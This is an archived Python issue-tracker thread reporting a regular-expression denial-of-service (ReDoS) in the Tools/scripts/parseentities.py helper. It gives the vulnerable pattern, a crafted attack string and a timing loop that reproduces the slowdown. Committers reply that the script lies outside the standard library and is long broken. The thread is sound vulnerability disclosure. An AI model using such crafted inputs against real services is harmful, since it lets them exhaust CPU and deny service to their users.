This issue tracker has been migrated to GitHub, and is currently read-only.
For more information, see the GitHub FAQs in the Python's Developer Guide.

classification
Title: REDoS in parseentities
Type: Stage:
Components: Demos and Tools Versions: Python 3.11, Python 3.10, Python 3.9
process
Status: open Resolution:
Dependencies: Superseder:
Assigned To: Nosy List: lemburg, pablogsal, serhiy.storchaka, yetingli
Priority: normal Keywords:

Created on 2020-10-03 15:12 by yetingli, last changed 2022-04-11 14:59 by admin.

Messages (3)
msg377885 - (view) Author: yeting li (yetingli) * Date: 2020-10-03 15:12
Hi,

I find this regex '<!ENTITY +(\w+) +CDATA +"([^"]+)" +-- +((?:.|\n)+?) *-->' may be stucked by input.
The vulnerable regex is located in
https://github.com/python/cpython/blob/8d21aa21f2cbc6d50aab3f420bb23be1d081dac4/Tools/scripts/parseentities.py#L18

The ReDOS vulnerability of the regex is mainly due to the sub-pattern ' +((?:.|\n)+?) *'
and can be exploited with the following string
'<!ENTITY a CDATA "a" -- ' + ' ' * 5000

You can execute the following code to reproduce ReDos


from Tools.scripts.parseentities import parse
from time import perf_counter

for i in range(0, 10000):
    ATTACK = '<!ENTITY a CDATA "a" -- ' + ' ' * i * 100
    LEN = len(ATTACK)
    BEGIN = perf_counter()
    parse(ATTACK)
    DURATION = perf_counter() - BEGIN
    print(f"{LEN}: took {DURATION} seconds!")





Looking forward for your response​!

Best,
Yeting Li
msg378011 - (view) Author: Pablo Galindo Salgado (pablogsal) * (Python committer) Date: 2020-10-05 09:47
Without evaluating the validity of the regex vulnerability, is important to note that the files in Tools/scripts are not part of the standard library and therefore they aren't a valid stack vector.
msg407783 - (view) Author: Marc-Andre Lemburg (lemburg) * (Python committer) Date: 2021-12-06 10:24
Interesting that the tool still exists. It uses mxTextTools, but in a non-packaged version, so it's been broken for two decades now :-)

I think it's safe to remove it from Tools\scripts.
History
Date User Action Args
2022-04-11 14:59:36adminsetgithub: 86087
2021-12-06 10:24:39lemburgsetmessages: + msg407783
2021-12-06 10:10:58iritkatrielsetnosy: + lemburg

versions: + Python 3.11, - Python 3.5, Python 3.6, Python 3.7, Python 3.8
2020-10-05 09:47:51pablogsalsetnosy: + pablogsal
messages: + msg378011
2020-10-03 16:37:11serhiy.storchakasetnosy: + serhiy.storchaka
2020-10-03 15:12:49yetinglicreate